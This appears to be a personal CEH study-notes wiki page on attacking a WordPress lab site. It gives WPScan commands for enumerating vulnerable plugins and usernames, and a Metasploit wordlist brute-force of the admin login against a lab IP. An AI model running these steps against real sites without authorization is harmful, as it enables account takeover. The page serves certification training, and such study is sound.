CEH_WordPress - yenbohuang/techNotes GitHub Wiki

Hacking Web Applications

Get API Token

TBD!!!!!!!!

Perform Cross-site Request Forgery (CSRF) Attack

--enumerate vp: specifies the enumeration of vulnerable plugins..

wpscan --api-token [API Token] --url http://10.10.1.22:8080/CEH --plugins-detection aggressive --enumerate vp

Enumerate and Hack a Web Application using WPScan and Metasploit

--enumerate u: specifies the enumeration of usernames.

# Get account name
wpscan --api-token [API Token] --url http://10.10.1.22:8080/CEH --enumerate u

# Guess password
service postgresql start
msfconsole

use auxiliary/scanner/http/wordpress_login_enum
show options

set PASS_FILE "/home/attacker/Desktop/CEHv12 Module 14 Hacking Web Applications/Wordlist/password.txt"
set RHOSTS 10.10.1.22
set RPORT 8080
set TARGETURI http://10.10.1.22:8080/CEH
set USERNAME admin

run